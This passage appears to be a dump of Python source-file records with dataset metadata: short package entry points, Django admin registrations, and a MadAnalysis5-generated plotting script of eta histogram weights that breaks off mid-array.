] | 1 | 2020-04-21T11:06:01.000Z | 2020-04-21T11:06:01.000Z | kreta/__main__.py | UnknownPlayer78/kreta-cli | 08c8a34ef17fa484e8bbb4785e744dc775541daa | [
"MIT"
] | null | null | null | import kreta
import sys
kreta.main(sys.argv) | 11.25 | 20 | 0.8 | 8 | 45 | 4.5 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 45 | 4 | 20 | 11.25 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f2ef48a3f6a1887872cca17042cd215e63f1c00f | 29 | py | Python | project/apps/django_backend_template/errors/__init__.py | adosaa/Backend-django-app | 3a7eb746ebc703e2cdbf1e4b2ac5703b3fedcd85 | [
"MIT"
] | 2 | 2020-11-04T21:47:48.000Z | 2020-11-04T21:47:50.000Z | project/apps/django_backend_template/errors/__init__.py | adosaa/Backend-Django-App | 3a7eb746ebc703e2cdbf1e4b2ac5703b3fedcd85 | [
"MIT"
] | null | null | null | project/apps/django_backend_template/errors/__init__.py | adosaa/Backend-Django-App | 3a7eb746ebc703e2cdbf1e4b2ac5703b3fedcd85 | [
"MIT"
] | null | null | null | from .student_error import *
| 14.5 | 28 | 0.793103 | 4 | 29 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
842eff326cca7b8e72344e462e7c463d2ce71ac9 | 89 | py | Python | omtool/datamodel/__init__.py | Kraysent/Galactic-archeology | 51ab18f4bdfc75c1c9eebd745f841b02c57d2d64 | [
"Apache-2.0"
] | 1 | 2021-11-27T16:24:07.000Z | 2021-11-27T16:24:07.000Z | omtool/datamodel/__init__.py | Kraysent/Galactic-archeology | 51ab18f4bdfc75c1c9eebd745f841b02c57d2d64 | [
"Apache-2.0"
] | 32 | 2021-09-12T16:57:03.000Z | 2021-12-04T09:06:54.000Z | omtool/datamodel/__init__.py | Kraysent/Galactic-archeology | 51ab18f4bdfc75c1c9eebd745f841b02c57d2d64 | [
"Apache-2.0"
] | null | null | null | from omtool.datamodel.snapshot import Snapshot
from omtool.datamodel.config import Config | 44.5 | 46 | 0.876404 | 12 | 89 | 6.5 | 0.5 | 0.25641 | 0.487179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078652 | 89 | 2 | 47 | 44.5 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
845f58647c6cca5b4f3b59c1a12eb982fecd74e7 | 225 | py | Python | friendcircle/admin.py | jossafossa/Project24_backend | bb5cc91d21c9f93034b85b3e94e829f7ab33c565 | [
"MIT"
] | null | null | null | friendcircle/admin.py | jossafossa/Project24_backend | bb5cc91d21c9f93034b85b3e94e829f7ab33c565 | [
"MIT"
] | 9 | 2019-12-04T23:15:59.000Z | 2022-02-10T09:08:38.000Z | friendcircle/admin.py | jossafossa/Project24_backend | bb5cc91d21c9f93034b85b3e94e829f7ab33c565 | [
"MIT"
] | null | null | null | from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.FriendCircle)
admin.site.register(models.FriendCircleMembership)
admin.site.register(models.FriendCircleMatcher)
| 25 | 50 | 0.835556 | 27 | 225 | 6.962963 | 0.481481 | 0.143617 | 0.271277 | 0.367021 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 225 | 8 | 51 | 28.125 | 0.908213 | 0.115556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8461f368189abd9815aa24fa81d620912cddea45 | 45,067 | py | Python | post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_4.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_4.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | post_optimization_studies/mad_analyses/ma100MeV_L1pt8-2pt4TeV_deta2pt6/Output/Histos/MadAnalysis5job_0/selection_4.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | [
"MIT"
] | null | null | null | def selection_4():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(-8.0,8.0,161,endpoint=True)
# Creating data sequence: middle of each bin
xData = numpy.array([-7.95,-7.85,-7.75,-7.65,-7.55,-7.45,-7.35,-7.25,-7.15,-7.05,-6.95,-6.85,-6.75,-6.65,-6.55,-6.45,-6.35,-6.25,-6.15,-6.05,-5.95,-5.85,-5.75,-5.65,-5.55,-5.45,-5.35,-5.25,-5.15,-5.05,-4.95,-4.85,-4.75,-4.65,-4.55,-4.45,-4.35,-4.25,-4.15,-4.05,-3.95,-3.85,-3.75,-3.65,-3.55,-3.45,-3.35,-3.25,-3.15,-3.05,-2.95,-2.85,-2.75,-2.65,-2.55,-2.45,-2.35,-2.25,-2.15,-2.05,-1.95,-1.85,-1.75,-1.65,-1.55,-1.45,-1.35,-1.25,-1.15,-1.05,-0.95,-0.85,-0.75,-0.65,-0.55,-0.45,-0.35,-0.25,-0.15,-0.05,0.05,0.15,0.25,0.35,0.45,0.55,0.65,0.75,0.85,0.95,1.05,1.15,1.25,1.35,1.45,1.55,1.65,1.75,1.85,1.95,2.05,2.15,2.25,2.35,2.45,2.55,2.65,2.75,2.85,2.95,3.05,3.15,3.25,3.35,3.45,3.55,3.65,3.75,3.85,3.95,4.05,4.15,4.25,4.35,4.45,4.55,4.65,4.75,4.85,4.95,5.05,5.15,5.25,5.35,5.45,5.55,5.65,5.75,5.85,5.95,6.05,6.15,6.25,6.35,6.45,6.55,6.65,6.75,6.85,6.95,7.05,7.15,7.25,7.35,7.45,7.55,7.65,7.75,7.85,7.95])
# Creating weights for histo: y5_ETA_0
y5_ETA_0_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00176902901165,0.199900298717,0.221128656457,0.24589505382,0.254740212878,0.369727080635,0.367958080824,0.431643154043,0.463485550653,0.56785833954,0.569627539352,0.659847929746,0.741223121082,0.833212711288,0.840288710535,0.836750710912,0.992425494337,1.05080348812,0.992425494337,1.10387428247,1.20470867174,1.26131786571,1.34976905629,1.34092425723,1.37807385328,1.5036746399,1.47006304348,1.46829424367,1.38868785215,1.427606648,1.29492946213,1.21532307061,1.0631866868,1.03488188982,0.925202301494,0.849133909593,0.714687923908,0.590855937092,0.555475140859,0.454640351595,0.35380584233,0.360881961577,0.22466669608,0.153905543614,0.109679788322,0.106141748699,0.0672231128428,0.0530708743496,0.0495328347263,0.0247664093631,0.0123832026816,0.0106141748699,0.0194593219282,0.0229973775515,0.0566089139729,0.0513018345379,0.0884514705826,0.125601066627,0.180440980789,0.24589505382,0.284813689676,0.359112921765,0.458178751218,0.502404346509,0.691690326356,0.734147121836,0.87743830658,0.953506698481,1.11448828134,1.22239906985,1.17817347456,1.29492946213,1.40284025064,1.37276665384,1.44352784631,1.427606648,1.39930225102,1.4116854497,1.39753305121,1.3356170578,1.28431506326,1.23832026816,1.20293987192,1.11271948153,1.05787948737,0.932278300741,0.909281103189,0.842057910347,0.753606319764,0.689921526544,0.64215753163,0.551937141236,0.474099949523,0.44933355216,0.42810515442,0.389186398564,0.329039404967,0.284813689676,0.24589505382,0.231742815326,0.130908146062,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_1
y5_ETA_1_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.123964269495,0.136780996886,0.17845040889,0.195550116838,0.22971923692,0.238287875896,0.265021892011,0.288501186629,0.367556910177,0.383601620413,0.448777705177,0.46268100507,0.509723847039,0.599484983607,0.591989367952,0.620817152446,0.658232880504,0.70416780701,0.754426081844,0.793997289012,0.821731946236,0.842036935154,0.871933066702,0.871919477551,0.924278475212,0.867667672104,0.916889574357,0.843115673911,0.806743912372,0.7511578911,0.750163884694,0.647537819219,0.628330354061,0.520448484711,0.523580783948,0.440276092688,0.368638566605,0.303462042192,0.271419464322,0.191294034805,0.158147658186,0.129307283743,0.10900221489,0.0737245798227,0.0523574788735,0.0395280376336,0.0299136975236,0.0170913626101,0.00854924246192,0.00962069503638,0.00961620262303,0.0117516497263,0.0245762788081,0.0299242171249,0.0448931982005,0.0598356284737,0.0876321563017,0.111142146413,0.137853900302,0.161386352479,0.237203381734,0.263907461749,0.325915995421,0.354788504208,0.402835584414,0.501126710815,0.542820223578,0.616582932959,0.694539494055,0.669996688523,0.791844207987,0.834558505777,0.853801142854,0.871908286486,0.929740514433,0.909381968274,0.867686457107,0.906151747216,0.874108529857,0.851672042684,0.798264682014,0.758701068783,0.722377668633,0.692441968676,0.631564571929,0.554609611175,0.53532780537,0.504351736022,0.475540338445,0.386833839876,0.357945983342,0.368651955915,0.315252149215,0.262870089966,0.246844924126,0.194495758615,0.202999409477,0.160293944635,0.136784633982,0.0908331606861,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_2
y5_ETA_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0937524222316,0.0944469023963,0.10833614569,0.13055895096,0.155559596888,0.165976519358,0.180560242816,0.207644249239,0.210422089898,0.245839698296,0.272923704719,0.294452069824,0.352786883657,0.39931589469,0.370148447774,0.429177701771,0.473623312311,0.482651314451,0.522235723838,0.502790919227,0.568070134707,0.533346926473,0.619460546893,0.634044150351,0.570848135366,0.582654138165,0.566681334378,0.562514533389,0.502790919227,0.49584611758,0.459734109017,0.433344502759,0.379870930079,0.381259850408,0.299313310976,0.267368023401,0.240283976979,0.193060565781,0.164587599029,0.154170636559,0.097224743055,0.097224743055,0.0618071346564,0.0541680528449,0.0354175843986,0.0263895702578,0.0201394087757,0.0104169344702,0.00694462564678,0.00694462564678,0.00416677298807,0.00625016148211,0.0152781716229,0.019444948611,0.0298618830812,0.0437511303747,0.0534736126802,0.0743074576206,0.0826410195967,0.123614309313,0.134031231783,0.177087921993,0.214588890886,0.222922412862,0.277784945871,0.328480717893,0.346536722174,0.383343250902,0.463900910005,0.475706912805,0.519457723179,0.533346926473,0.570848135366,0.574320536189,0.61459934574,0.584042938494,0.579181737342,0.595154141129,0.577098136848,0.542375328614,0.532652526308,0.483345714616,0.448622906382,0.469456511323,0.447928106217,0.397232494196,0.351397963327,0.352092443492,0.312508074105,0.298618830812,0.273618184883,0.219450132038,0.222922412862,0.201394087757,0.18403252364,0.136114632277,0.149309435406,0.113197386843,0.102780424372,0.0812520992674,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_3
y5_ETA_3_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0516829757602,0.0654334599532,0.0938828286286,0.101943471087,0.10336591152,0.134186040919,0.12707371875,0.150781485979,0.165006170317,0.198197060438,0.199145340727,0.211473384487,0.254621557644,0.250354156343,0.267423761548,0.280700125597,0.306778693549,0.344711145116,0.367470592056,0.374582914225,0.370789673068,0.379324475671,0.397342401165,0.389755918852,0.410144525069,0.405402923623,0.385488517551,0.393549160009,0.364625671189,0.340917863959,0.32337413861,0.297295570657,0.284493366753,0.252724957066,0.218111586511,0.204361062318,0.154574727136,0.137979282075,0.106210872388,0.0881929468935,0.0763390632788,0.058795297929,0.0398290721455,0.0317684256874,0.0279751805307,0.0165954450606,0.0123280437593,0.00900895474719,0.00663817802424,0.00474155744589,0.00521571359048,0.00616402187965,0.00995726703636,0.010431423181,0.0180179134944,0.0303459572537,0.034613358555,0.0545278966277,0.0602177783628,0.0630626992303,0.101469310942,0.119487196436,0.131815240196,0.146039924533,0.18492069639,0.219534026945,0.238500272728,0.288760768055,0.300140491525,0.31104609485,0.352771787574,0.383591876972,0.389755918852,0.39260083972,0.405402923623,0.416308526949,0.399239001744,0.390230078997,0.396868241021,0.372212153502,0.364151511044,0.353720067863,0.331908941212,0.324796579043,0.300614651669,0.284493366753,0.264578840681,0.239922753162,0.213370025065,0.191558858414,0.174015093064,0.148410685256,0.154100566991,0.139401762509,0.135608521352,0.121383837015,0.0862963063152,0.0796581442909,0.0815547448693,0.0526312560494,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_4
y5_ETA_4_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_5
y5_ETA_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.0521138287,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.0529581672,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,1.05462838872,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_6
y5_ETA_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.23066382848,0.0,0.0,0.0,0.0,0.69099811103,0.230610340271,0.690550070428,0.460764801152,0.229973208092,0.460868549833,0.0,0.690745655905,0.92192538431,0.461177106097,0.691462290316,0.0,0.460062384154,0.461170189518,0.690533931745,0.230742908031,0.461014566496,0.230587822965,0.460908128034,0.460429347082,0.920029088968,0.460863938781,0.23001086502,0.230176939761,0.0,0.230587822965,0.0,0.23075470464,0.0,0.229943159399,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.230742908031,0.0,0.230587822965,0.0,0.0,0.0,0.0,0.0,0.0,0.23001086502,0.23048899274,0.230635893187,0.0,0.690700698143,0.230455985289,0.459667370656,0.690855168402,0.0,0.461102176493,0.0,0.230559772396,1.61298920284,0.691325495758,0.921506931295,0.230513200765,0.691642121363,0.0,0.0,1.38141215541,0.461120236449,0.459480623029,0.0,0.460105804898,0.0,0.230541942993,0.230742908031,0.229922717067,0.230742908031,0.230578408733,0.460551539973,0.0,0.459871025475,0.0,0.690196172149,0.0,0.230610340271,0.230350853292,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_7
y5_ETA_7_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0554497187393,0.0831772132794,0.0276923255935,0.0277259711423,0.0277276753474,0.138466629021,0.110769756316,0.138467129126,0.138488556717,0.0553483897024,0.138584500004,0.0276911868921,0.277051898417,0.387609725475,0.277006619649,0.193619592942,0.498684276764,0.415236698841,0.249279240517,0.664729638219,0.553676245234,0.304793242028,0.581456712471,0.94163719854,0.581457097167,0.636367894693,0.415431355229,0.636816450718,0.360012950779,0.719644282709,0.52583422657,0.692253128248,0.443167967075,0.304538880756,0.470773397441,0.415600236957,0.332220904179,0.415136677772,0.387777837811,0.276896288716,0.166227168983,0.110941792554,0.0,0.0831001970562,0.166023049063,0.0831835607703,0.0276396529597,0.0277073672235,0.0554357157896,0.0,0.0830498787646,0.0,0.0,0.0554043630314,0.110818074186,0.193787551399,0.166214281653,0.193802939256,0.110855466678,0.304774892009,0.193723537915,0.193964203995,0.304304869924,0.360142208775,0.332415868325,0.359878307032,0.498603490516,0.609169473138,0.719912031417,0.609177167067,0.553765110107,0.8304499312,0.526001184816,0.637089585176,0.470554889874,0.44313411379,0.387617419404,0.470614902516,0.637204224709,0.332489730037,0.387508550317,0.249238501167,0.30444070623,0.360112817969,0.470799556797,0.249110628077,0.33238301525,0.221422026345,0.27701616012,0.193771240271,0.138377610269,0.193799977093,0.166182159502,0.1662747944,0.166080099542,0.0554841105992,0.0830483399789,0.0276601880546,0.0276944452707,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_8
y5_ETA_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0100438003315,0.0,0.020069481246,0.0403233606305,0.0201706125931,0.0807098054735,0.0403435250051,0.0302586495453,0.0806750351255,0.0705902385514,0.0605934115643,0.0806740642258,0.05041745357,0.0907537028949,0.100840926719,0.131116918961,0.201688771098,0.0907304619817,0.12090657291,0.161249035994,0.211765436387,0.181505099903,0.201655396418,0.201604181456,0.201556668048,0.25191390156,0.241885417172,0.191572177556,0.241997313371,0.181477611303,0.262121092186,0.181701828468,0.282343053241,0.231843097463,0.211727025164,0.191528790473,0.191531217722,0.100873997992,0.141230357078,0.0504588624451,0.0705737939365,0.0503704741575,0.0403452847609,0.030221506561,0.0302204567757,0.0403551029848,0.0201721417603,0.0100840866037,0.0,0.0201625601932,0.0100784735894,0.0,0.0100984680565,0.0201051071994,0.0403589016302,0.0302095462895,0.0100417371695,0.0503333675819,0.0706071686161,0.141281632722,0.0806791007683,0.141206934121,0.221696891479,0.121029573775,0.141177139635,0.201599630363,0.201670870133,0.181574579918,0.282271874152,0.342858204216,0.302265370355,0.292354486201,0.242019644065,0.211727631977,0.36291905659,0.292299751727,0.22175787612,0.191575393662,0.191545417131,0.141183511164,0.110865224101,0.121067742272,0.16122427805,0.110888161608,0.141173559442,0.0906855578675,0.0605321053121,0.0806919651903,0.100803971846,0.0302321985947,0.0806162956896,0.0302714229454,0.0504079994335,0.0201459274665,0.050354442175,0.0100580543537,0.0604864366142,0.0403263036704,0.0100840866037,0.0100909617877,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_9
y5_ETA_9_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00566295640025,0.011324135308,0.00565456525066,0.0141570004909,0.0226118050884,0.0169582401582,0.00848816143696,0.0169684241898,0.0141489171322,0.0339524572259,0.0395961843893,0.0452846220292,0.0396047640608,0.0311416760406,0.0282917323097,0.0622405152817,0.0651042788242,0.0735898432754,0.0791848663752,0.0763938953821,0.0820738302982,0.0877463782326,0.118837684291,0.0877033644534,0.116009316703,0.127320401677,0.113151670505,0.132955860807,0.147067958452,0.164110571792,0.161220607549,0.152738890484,0.147084694582,0.107533255296,0.127317323768,0.0792318814362,0.0876694305059,0.101858591299,0.0876679684991,0.0509369327115,0.0537586827953,0.0424637183704,0.0113093844288,0.0283114578595,0.0,0.0,0.00282704062473,0.00566127893981,0.00283093494918,0.0,0.0,0.0,0.00848445640392,0.00849299375419,0.00848656092425,0.0141406914203,0.00565437288134,0.0169897194731,0.0396199997107,0.039619076338,0.0480680521451,0.0622467480476,0.0735533315791,0.121700255144,0.116013164089,0.107528830802,0.124484916424,0.0933398623778,0.138657187191,0.158424096319,0.172575898991,0.118786475579,0.13295320611,0.113125700647,0.0905032229089,0.127314245858,0.1273424472,0.107518827597,0.0905340404735,0.0933439021335,0.0820341252713,0.0707311967567,0.067903521698,0.0565758160154,0.0594098777355,0.0678847464527,0.0339625950889,0.0395974155529,0.0368062791222,0.0198075798493,0.0424600248795,0.0254587170788,0.0169800432965,0.0113153478776,0.00282138458208,0.0113131817991,0.00849030827853,0.0,0.00282926633772,0.0028303705376,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_10
y5_ETA_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00152202209491,0.00153762419274,0.00151823557942,0.0,0.00304238781081,0.0,0.00455922692805,0.00153506755638,0.00607796580095,0.00614214280808,0.00305665842566,0.00303492701664,0.00456932942226,0.00760525948154,0.0121545256882,0.0151996757059,0.0107051019054,0.0182826908786,0.0136927843143,0.01219955037,0.0121796194757,0.0106724575342,0.0152543054957,0.0137072569554,0.0197466723662,0.0137299878627,0.0136878104515,0.0243635157645,0.0289091892119,0.0198139435649,0.0152209770708,0.0152249703383,0.0198174642564,0.0121980971987,0.0152561249134,0.00611227363972,0.0122009917269,0.00151057630332,0.0,0.00153570553403,0.00153570553403,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00303341713621,0.00608247653921,0.00764060462471,0.00153094314903,0.00915437317915,0.0166988641082,0.0106842991083,0.0137056147536,0.0258996123552,0.022795626621,0.0228577349265,0.0274276042669,0.0320015968332,0.027394866562,0.0152047677127,0.0167623901419,0.0213671001505,0.016774594418,0.0106712465581,0.00610048759338,0.00918429433087,0.0197751805155,0.0121978963539,0.0106675699166,0.00457483729596,0.0137148654295,0.0075838458799,0.00762130934516,0.00914809264363,0.00303094201922,0.00609739103891,0.00455093321861,0.00304564267826,0.0,0.0030378168191,0.0,0.0,0.0,0.00151207318791,0.0,0.0015203657159,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_11
y5_ETA_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000180814219866,0.0,0.0,0.0,0.0,0.000180745208083,0.0,0.000722789817579,0.000541501026178,0.0,0.0,0.000180671921576,0.0,0.00126358570663,0.000721773126145,0.00108518832405,0.000721297899921,0.000902511594796,0.000723285839764,0.000723493799376,0.000721499312656,0.00126454386128,0.0019856191674,0.00198612173646,0.00108395712613,0.00162413298745,0.000902164995444,0.00162516238752,0.0034314117686,0.00288654949893,0.00306978733402,0.00613716926854,0.00397395028218,0.00577876628238,0.0048752472388,0.00325236470479,0.00433244184372,0.00523725485822,0.002348185582,0.00288798403514,0.00126357376821,0.000180062561403,0.00036126485701,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000180716286293,0.000541808344271,0.00036126485701,0.00162486431208,0.00144244791745,0.00198723701616,0.00433470629283,0.00379308549732,0.0037906315739,0.00686007538945,0.00487359126411,0.00288952563204,0.00469405279944,0.00379094004733,0.00307069850521,0.00252805909271,0.00144634330907,0.00144421403371,0.00108284646776,0.00126255322567,0.000721577490066,0.000720977488075,0.00162520783055,0.000542324392196,0.000542304751566,0.00108244672317,0.0016257804897,0.000361514100456,0.000540905645512,0.000180612152443,0.00054218151624,0.000542731068769,0.000180745208083,0.000361432380031,0.0,0.000180461112147,0.000180176168968,0.0,0.000360324571478,0.0,0.